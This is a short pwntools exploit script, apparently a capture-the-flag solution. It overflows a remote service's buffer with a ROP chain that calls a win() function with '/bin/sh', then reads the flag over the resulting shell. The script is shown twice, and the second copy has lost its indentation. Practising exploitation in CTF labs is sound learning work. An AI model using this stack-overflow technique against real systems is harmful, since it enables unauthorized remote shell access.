0xb0bb/baby1.py

## baby1.py
#!/usr/bin/env python2
from pwn import *
import sys

# context(terminal=['tmux', 'splitw', '-h'])  # horizontal split window
# context(terminal=['tmux', 'new-window'])    # open new window

def fail(msg):
    log.info("Exploit failed: {}".format(msg))
    exit(1)

def success(msg):
    log.success("{}".format(msg))
    exit(1337)

def main():

    HOST, PORT = sys.argv[1].split(':')
    io = remote(HOST, PORT)

    rop  = cyclic(24)
    rop += p64(0x40053e)  # ret (for stack alignment so system() does not crash due to xmm SSE registers)
    rop += p64(0x400793)  # pop rdi ; ret
    rop += p64(0x400286)  # /bin/sh
    rop += p64(0x400698)  # win()

    print io.recvuntil(': ')[:-7]
    io.sendline(rop)

    io.sendline('cat flag')
    flag = io.recvline().strip()

    return flag

if __name__== '__main__':

    if len(sys.argv) < 2:
        fail('No target')

    flag = main()
    if flag.startswith("sctf{"):
        success(flag)

    fail("")
	#!/usr/bin/env python2
	from pwn import *
	import sys

	# context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
	# context(terminal=['tmux', 'new-window']) # open new window

	def fail(msg):
	log.info("Exploit failed: {}".format(msg))
	exit(1)

	def success(msg):
	log.success("{}".format(msg))
	exit(1337)

	def main():

	HOST, PORT = sys.argv[1].split(':')
	io = remote(HOST, PORT)

	rop = cyclic(24)
	rop += p64(0x40053e) # ret (for stack alignment so system() does not crash due to xmm SSE registers)
	rop += p64(0x400793) # pop rdi ; ret
	rop += p64(0x400286) # /bin/sh
	rop += p64(0x400698) # win()

	print io.recvuntil(': ')[:-7]
	io.sendline(rop)

	io.sendline('cat flag')
	flag = io.recvline().strip()

	return flag

	if __name__== '__main__':

	if len(sys.argv) < 2:
	fail('No target')

	flag = main()
	if flag.startswith("sctf{"):
	success(flag)

	fail("")